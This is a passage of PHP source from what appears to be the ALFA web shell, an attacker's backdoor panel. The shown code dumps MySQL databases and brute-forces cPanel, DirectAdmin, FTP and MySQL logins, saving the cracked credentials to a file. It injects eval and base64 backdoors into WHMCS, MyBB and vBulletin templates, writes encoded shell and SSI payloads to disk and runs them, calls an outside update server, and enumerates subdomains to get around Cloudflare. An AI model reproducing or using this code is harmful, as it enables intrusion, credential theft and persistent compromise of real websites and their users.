  if (count($selected_data) > 0) {
    if ($db) {
      if (!is_dir($dfile)) {
        $dfile = $GLOBALS['cwd'];
      }
      $tbls = "";
      $ext = '.txt';
      if ($delimiter == 'json') {
        $ext = '.json';
      }
      foreach ($selected_data as $tbl => $cols) {
        $tables_query = mysqli_query($db, "SELECT ".implode(',', $cols)." FROM $tbl");
        $file_name = $dfile.'/'.$dbname.'.'.$tbl.$ext;
        $fp = fopen($file_name, "w");
        $data = array();
        while ($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)) {
          if ($delimiter == "json") {
            $col_arr = array();
            foreach ($row as $key => $value) {
              if (empty($value)) {
                $value = "[empty]";
              }
              $col_arr[$key] = $value;
            }
            $data[$tbl][] = $col_arr;
          } else {
            $data = "";
            foreach ($row as $key => $value) {
              if (empty($value)) {
                $value = "[empty]";
              }
              $data .= $value . $delimiter;
            }
            fwrite($fp, $data ."\n");
          }
        }
        if ($delimiter == "json") {
          fwrite($fp, json_encode($data));
        }
        fclose($fp);
        $tbls .= "Done ~~~> ".$file_name."
";
      }
      echo __pre();
      echo "
".$tbls."
";
    }
  }
  if (!empty($dbname) && count($selected_data) == 0) {
    //echo __pre();
    if ($db) {
      echo("
[ Select your tables and columns for dumping data ]
");
      echo("
Output Type: 
 Delimiter: 
");
      $data = array();
      $tables_query = mysqli_query($db, "SELECT table_name FROM information_schema.tables WHERE table_schema = database();");
      while ($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)) {
        $data[$row["table_name"]] = array();
        $table_count_q = mysqli_query($db, "SELECT count(*) FROM `".$row['table_name']."`");
        $table_count = mysqli_fetch_row($table_count_q);
        $data[$row["table_name"]]["data_count"] = $table_count[0];
        $columns_query = mysqli_query($db, "SELECT column_name FROM information_schema.columns WHERE table_name = '".$row['table_name']."'");
        while ($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) {
          $data[$row["table_name"]]["cols"][] = $row2["column_name"];
        }
      }
      mysqli_close($db);

      echo '
    ';
      foreach ($data as $tbl => $cols) {
        echo '
  • '.$tbl.' ('.$cols["data_count"].')
      ';
        foreach ($cols["cols"] as $col) {
          echo '
    • ' . $col . '
      • ';
        }
        echo '
    • ';
      }
      echo '
';
    } else {
      echo('
mysqli_connect : Error!
');
    }
  }
  echo('
');
  alfafooter();
}
function alfaDumper() {
  alfahead();
  echo('
');
  AlfaNum(8, 9, 10);
  echo "

| Mysql Database Dumper |


".getConfigHtml('all')."
";
  $table = array('td1' =>
   array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
   'td2' =>
   array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
   'td3' =>
   array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
   'td4' =>
   array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
   'td5' =>
   array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
  );
  create_table($table);
  echo "
";
  $username = ($_POST['alfa3']);
  $password = ($_POST['alfa4']);
  $dbname = ($_POST['alfa5']);
  $dfile = ($_POST['alfa6']);
  $host = ($_POST['alfa7']);
  if (!empty($dbname)) {
    echo __pre();
    $msg = "
Check this :  ".$dfile."
";
    if (@mysqli_connect($host, $username, $password, $dbname)) {
      if (strlen(alfaEx("mysqldump")) > 0) {
        alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
        echo($msg);
      } else {
        __alert("Error...!");
      }
    } else {
      echo('
mysqli_connect : Error!
');
    }
  }
  echo('
');
  alfafooter();
}
function Alfa_DirectAdmin_Cracker($info) {
  if (!$info['mysql']) {
    $url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
  } else {
    $url = $info['protocol'].$info['target'].'/phpmyadmin';
  }
  $curl = curl_init();
  curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($curl, CURLOPT_HEADER, 0);
  curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($curl, CURLOPT_URL, $url);
  curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
  if ($info['mysql']) {
    curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
  }
  $result = @curl_exec($curl);
  $curl_errno = curl_errno($curl);
  $curl_error = curl_error($curl);
  if ($curl_errno > 0) {
    echo "Error: $curl_error
";
  } elseif (preg_match('/CMD_FILE_MANAGER|frameset/i', $result)) {
    echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';
    $info['target'] = $url;
    CrackerResualt($info);
  }
  curl_close($curl);
}
function Alfa_CP_Cracker($info) {
  $url = $info['protocol'].$info['target'].':'.$info['port'];
  $curl = curl_init();
  curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($curl, CURLOPT_HEADER, 0);
  curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
  curl_setopt($curl, CURLOPT_URL, $url);
  $result = @curl_exec($curl);
  $curl_errno = curl_errno($curl);
  $curl_error = curl_error($curl);
  if ($curl_errno > 0) {
    echo "Error: $curl_error
";
  } elseif (preg_match('/filemanager/i', $result)) {
    echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';
    $info['target'] = $url;
    CrackerResualt($info);
  }
  curl_close($curl);
}
function Alfa_FTP_Cracker($info) {
  $url = $info['protocol'].$info['target'];
  $curl = curl_init();
  curl_setopt($curl, CURLOPT_URL, $url);
  curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
  $result = @curl_exec($curl);
  $curl_errno = curl_errno($curl);
  $curl_error = curl_error($curl);
  if ($curl_errno > 0) {
    echo "Error: $curl_error
";
  } elseif (preg_match('/(\d+):(\d+)/i', $result)) {
    echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';
    $info['target'] = $url;
    CrackerResualt($info);
  }
  curl_close($curl);
}
function Alfa_Mysql_Cracker($info) {
  if (@mysqli_connect($info['target'].':'.$info['port'], $info['username'], $info['password'])) {
    CrackerResualt($info);
    echo 'UserName: '.$info['username'].' PassWord: '.$info['password'].'  Login Success....
';
  }
}
function Alfa_FTPC($info) {
  if ($con = @ftp_connect($info['target'], $info['port'])) {
    if ($con) {
      $login = @ftp_login($con, $info['username'], $info['password']);
      if ($login) {
        CrackerResualt($info);
      }
    }
  }
  @ftp_close($con);
}
function CrackerResualt($info) {
  $res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
  $c = @fopen($info['fcrack'], 'a+');
  @fwrite($c, $res);
  @fclose($c);
}
function Alfa_Call_Function_Cracker($method, $info) {
  switch ($method) {
    case 'cp':return Alfa_CP_Cracker($info);
      break;
    case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);
      break;
    case 'ftp':return Alfa_FTP_Cracker($info);
      break;
    case 'mysql':return Alfa_Mysql_Cracker($info);
      break;
    case 'mysql':return Alfa_FTPC($info);
      break;
  }
}
function alfaCrackers() {
  alfahead();
  AlfaNum(9, 10);
  echo '

| Brute Forcer |


Login Page:  Protocol:  Website/ip Address: 
Port: 

Users ListPasswords


  


Save Result Into File 

';
  $target = str_replace(array('https://','http://','ftp://'), '', $_POST['alfa1']);
  $port = $_POST['alfa2'];
  $usernames = $_POST['alfa3'];
  $passwords = $_POST['alfa4'];
  $fcrack = $_POST['alfa5'];
  $cracking = $_POST['alfa6'];
  $protocol = $_POST['alfa7'];
  $loginpanel = $_POST['alfa8'];
  $p = $loginpanel == 'phpmyadmin' ? $p = true : false;
  if ($cracking == 'start') {
    echo __pre();
    $exuser = explode("\n", $usernames);
    $expw = explode("\n", $passwords);
    foreach ($exuser as $user) {
      foreach ($expw as $pw) {
        $array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
        Alfa_Call_Function_Cracker($loginpanel, $array);
      }
    }
    echo '
Attack Finished...';
  }
  echo '
';
  alfafooter();
}
function output($string) {
  echo "

Click Here !


";
}
function alfaShellInjectors() {
  alfahead();
  echo '
';
  AlfaNum(11);
  echo '
| Cms Shell Injector |
| WHMCS | | MyBB | | vBulletin |
';
  $selector = '
Shell Inject Method : 
 
';
  if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'whmcs') {
    AlfaNum();
    echo __pre()."
| WHMCS |
".getConfigHtml('whmcs')."
";
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
     'td5' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
    );
    create_table($table);
    echo $selector;
    echo "
"; if (isset($_POST['alfa6'])) { $dbu = $_POST['alfa6']; $dbn = $_POST['alfa7']; $dbp = $_POST['alfa8']; $dbh = $_POST['alfa9']; $path = $_POST['alfa10']; $method = $_POST['alfa4']; $index = "{php}".ALFA_UPLOADER.";{/php}"; $newin = str_replace("'", "\'", $index); $newindex = "

Dear $newin,

Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.

To reset your password, please visit the url below:
{\$pw_reset_url}

When you visit the link above, your password will be reset, and the new password will be emailed to you.

{\$signature}

{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}"; if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) { if (filter_var($path, FILTER_VALIDATE_URL)) { $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_connect_error()); $soleSave = mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'"); $soleGet = mysqli_fetch_assoc($soleSave); $tempSave1 = $soleGet['message']; $tempSave = str_replace("'", "\'", $tempSave1); mysqli_query($conn, "UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die(mysqli_error($conn)); $inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'"; $result = mysqli_query($conn, $inject) or die(mysqli_error($conn)); $create = "insert into tblclients (email) values('solevisible@fbi.gov')"; $result2 = mysqli_query($conn, $create) or die(mysqli_error($conn)); if (function_exists('curl_version') && $method == 'auto') { $AlfaSole = new AlfaCURL(true); $saveurl = $AlfaSole->Send($path."/pwreset.php"); $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i", $saveurl, $token); $AlfaSole->Send($path."/pwreset.php", "post", "token={$token[1]}&action=reset&email=solevisible@fbi.gov"); $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'"; $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn)); __alert("shell injectet..."); $ff = 'http://'.$path."/solevisible.php"; output($ff); } else { echo "

Please go to Target => ".$path."/pwreset.php
 And Reset Password With Email => solevisible@fbi.gov
And Go To => ".$path."/solevisible.php


";
          }
        } else {
          __alert('Path is not Valid...');
        }
      }
    }
  }if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'mybb') {
    AlfaNum(1, 2, 3, 5);
    echo __pre()."
| MyBB |
".getConfigHtml("mybb")."

";
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id' => 'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id' => 'db_name' ,'inputValue' => '', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
     'td5' =>
     array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id' => 'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
    );
    create_table($table);
    echo $selector;
    echo "
";
    if (isset($_POST['alfa6'])) {
      $dbu = $_POST['alfa6'];
      $dbn = $_POST['alfa7'];
      $dbp = $_POST['alfa8'];
      $dbh = $_POST['alfa9'];
      $prefix = $_POST['alfa10'];
      $method = $_POST['alfa4'];
      $shellCode = "{\${".ALFA_UPLOADER."}}";
      $newinshell = str_replace("'", "\'", $shellCode);
      if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)) {
        $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
        $inject = "select template from {$prefix}templates where  title= 'calendar'";
        $result = mysqli_query($conn, $inject) or die(mysqli_error($conn));
        $GetTemp = mysqli_fetch_assoc($result);
        $saveDate = $GetTemp['template'];
        $repsave = str_replace($shellCode, "", $saveDate);
        $repsave = str_replace("'", "\'", $repsave);
        $createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
        $result2 = mysqli_query($conn, $createShell) or die(mysqli_error($conn));
        $geturl = "select value from {$prefix}settings where name= 'bburl'";
        $findurl = mysqli_query($conn, $geturl) or die(mysqli_error($conn));
        $rowb = mysqli_fetch_assoc($findurl);
        $furl = $rowb['value'];
        $realurl = parse_url($furl, PHP_URL_HOST);
        $realpath = parse_url($furl, PHP_URL_PATH);
        $res = false;
        $AlfaCurl = new AlfaCURL();
        if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto') {
          if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) {
            @fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
            @fputs($fsock, "HOST: $realurl\r\n");
            @fputs($fsock, "Connection: close\r\n\r\n");
            $check = fgets($fsock);
            if (preg_match("/200 OK/i", $check)) {
              $repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
              $clear = mysqli_query($conn, $repairdbtemp) or die(mysqli_error($conn));
              $res = true;
            }
            @fclose($fsock);
          }
        } elseif (function_exists('curl_version') && $method == 'auto') {
          $AlfaCurl->Send($realurl.$realpath."/calendar.php");
          $res = true;
        }
        if ($res) {
          $ff = 'http://'.$realurl.$realpath."/solevisible.php";
          output($ff);
        } else {
          $ff = 'http://'.$realurl.$realpath."/calendar.php";
          $fff = 'http://'.$realurl.$realpath."/solevisible.php";
          echo "

Please Go To Target => ".$ff."
And Go To => ".$fff."


";
        }
      }
    }
  }
  if (isset($_POST['alfa3']) && $_POST['alfa3'] == 'vb') {
    AlfaNum(1, 2, 7, 9, 10);
    echo __pre().'
| vbulletin |
'.getConfigHtml('vb').'
';
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id' => 'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id' => 'db_name','inputValue' => '', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id' => 'db_user','inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id' => 'db_pw','inputValue' => '', 'inputSize' => '50'),
     'td5' =>
     array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id' => 'db_prefix','inputValue' => '', 'inputSize' => '50')
    );
    create_table($table);
    echo $selector;
    echo '
';
    if (isset($_POST['alfa4']) && !empty($_POST['alfa4'])) {
      $method = $_POST['alfa8'];
      $faq_name = "faq";
      $faq_file = "/faq.php";
      $code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
      $conn = @mysqli_connect($_POST['alfa2'], $_POST['alfa4'], $_POST['alfa5'], $_POST['alfa7']) or die(@mysqli_connect_error());
      $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
      $recivedata = @mysqli_query($conn, $rec);
      $getd = @mysqli_fetch_assoc($recivedata);
      $savetoass = $getd['template'];
      if (empty($savetoass)) {
        $faq_name = "header";
        $faq_file = "/";
        $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
        $recivedata = @mysqli_query($conn, $rec);
        $getd = @mysqli_fetch_assoc($recivedata);
        $savetoass = $getd['template'];
        $code = ALFA_UPLOADER.";";
      }
      $code = str_replace("'", "\'", $code);
      $p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='".$faq_name."'";
      $ka = @mysqli_query($conn, $p) or die(mysqli_error($conn));
      $geturl = @mysqli_query($conn, "select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
      $getval = @mysqli_fetch_assoc($geturl);
      $saveval = $getval['value'];
      if ($faq_name == "header") {
        if (substr($saveval, -5, 5) == "/core") {
          $saveval = substr($saveval, 0, -5);
        }
      }
      $realurl = parse_url($saveval, PHP_URL_HOST);
      $realpath = parse_url($saveval, PHP_URL_PATH);
      $res = false;
      $AlfaCurl = new AlfaCURL();
      if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto') {
        if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) {
          @fputs($fsock, "GET $realpath.$faq_file HTTP/1.1\r\n");
          @fputs($fsock, "HOST: $realurl\r\n");
          @fputs($fsock, "Connection: close\r\n\r\n");
          $check = fgets($fsock);
          if (preg_match("/200 OK/i", $check)) {
            $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn, $savetoass)."' WHERE title ='".$faq_name."'";
            $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn));
            $res = true;
          }
          @fclose($fsock);
        }
      } elseif (function_exists('curl_version') && $method == 'auto') {
        $AlfaCurl->Send($realurl.$realpath.$faq_file);
        $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn, $savetoass)."' WHERE title ='".$faq_name."'";
        $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn));
        $res = true;
      }
      if ($res) {
        $ff = 'http://'.$realurl.$realpath."/solevisible.php";
        output($ff);
      } else {
        $ff = 'http://'.$realurl.$realpath.$faq_file;
        $fff = 'http://'.$realurl.$realpath."/solevisible.php";
        echo "
First Open This Link => ".$ff."
Second Open This Link => ".$fff."
";
      }
    }
  }
  echo '';
  alfafooter();
}
function alfacheckfiletype() {
  $path = $_POST['path'];
  $arg = $_POST['arg'];
  if (@is_file($path.'/'.$arg)) {
    echo("file");
  } else {
    echo("dir");
  }
}
function alfacheckupdate() {
  if ($GLOBALS["DB_NAME"]["cgi_api"]) {
    if (!isset($_COOKIE["alfacgiapi_mode"]) && !isset($_COOKIE["alfacgiapi"])) {
      _alfa_cgicmd("whoami", "perl", true);
      if (strlen(alfaEx("whoami", false, true)) > 0) {
        __alfa_set_cookie("alfa_canruncmd", "true");
      }
    }
  }
  if (function_exists("curl_version")) {
    $update = new AlfaCURL();
    $json = $update->Send("http://solevisible.com/update.json?ver=".__ALFA_VERSION__);
    $json = @json_decode($json, true);
    $data = array();
    if ($json) {
      if (!isset($_COOKIE['alfa_checkupdate']) && !empty($json["type"])) {
        if ($json["type"] == "update") {
          if (__ALFA_VERSION__ != $json['version'] || __ALFA_UPDATE__ != $json['version_number']) {
            @setcookie("alfa_checkupdate", "1", time() + 86400);
            $data["content"] = '
'.$json["content"].'
';
          }
        }
      }
      if (isset($json["ads"]) && !empty($json["ads"])) {
        $data["content"] .= $json["ads"];
      }
      if (isset($json["copyright"]) && !empty($json["copyright"])) {
        $data["copyright"] = $json["copyright"];
      }
      if (isset($json["solevisible"]) && !empty($json["solevisible"])) {
        $data["solevisible"] = $json["solevisible"];
      }
      if (isset($json["code_name"]) && !empty($json["code_name"])) {
        $data["code_name"] = $json["code_name"];
        $data["version_number"] = __ALFA_VERSION__;
      }
      if (isset($json["market"]) && !empty($json["market"])) {
        $data["market"] = $json["market"];
      }
      echo @json_encode($data);
    }
  }
}
function alfaWriteTocgiapi($name, $source) {
  $temp = "";
  $not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa");
  if (in_array($name, $not_api)) {
    $temp = ALFA_TEMPDIR;
    if ($temp) {
      @chdir($temp);
    }
  } else {
    alfaCreateParentFolder();
    @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
  }
  @mkdir('alfacgiapi', 0755);
  __write_file("alfacgiapi/".$name, __get_resource($source));
  @chmod("alfacgiapi/".$name, 0755);
  return $temp;
}
function alfacheckcgi() {
  if (strlen(alfaEx("id", false, true, true)) > 0) {
    echo("ok");
  } else {
    echo("no");
  }
}
function alfaupdateheader() {
  if (!isset($_COOKIE["updateheader_data"])) {
    $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
    $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
    $tmp_path = alfaWriteTocgiapi("getheader.alfa", $bash);
    $data = alfaEx("cd '{$tmp_path}/alfacgiapi';sh getheader.alfa", false, true, true);
    if (@is_array(@json_decode($data, true))) {
      __alfa_set_cookie("updateheader_data", __ZW5jb2Rlcg($data));
      echo $data;
    }
  } else {
    echo __ZGVjb2Rlcg($_COOKIE["updateheader_data"]);
  }
}
function alfassiShell() {
  alfahead();
  echo '
';
  alfaCreateParentFolder();
  @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
  @mkdir('alfa_shtml', 0755);
  @chdir('alfa_shtml');
  alfacgihtaccess('shtml');
  $code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
  @__write_file('alfa_ssi.shtml', __get_resource($code));
  @chmod("alfa_ssi.shtml", 0755);
  echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
  echo '
';
  alfafooter();
}
function alfacloudflare() {
  alfahead();
  AlfaNum(8, 9, 10, 7, 6, 5, 4, 3);
  echo "

| Cloud Flare ByPasser |

>'); return false;\" method='post'>

Target:
  
";
  if ($_POST['alfa2'] && $_POST['alfa2'] == '>>') {
    $url = $_POST['alfa1'];
    if (!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)) {
      $url = preg_replace('/^(https?):\/\//', '', $url);
      $url = "http://www.".$url;
    }
    $headers = @get_headers($url, 1);
    $server = $headers['Server'];
    $subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
    if (preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)) {
      if ($matches[2] != 'www') {
        $url = preg_replace('/^(https?):\/\//', '', $url);
      } else {
        $url = explode($matches[0], $url);
        $url = $url[1];
      }
    }
    if (is_array($server)) {
      $server = $server[0];
    }
    echo __pre();
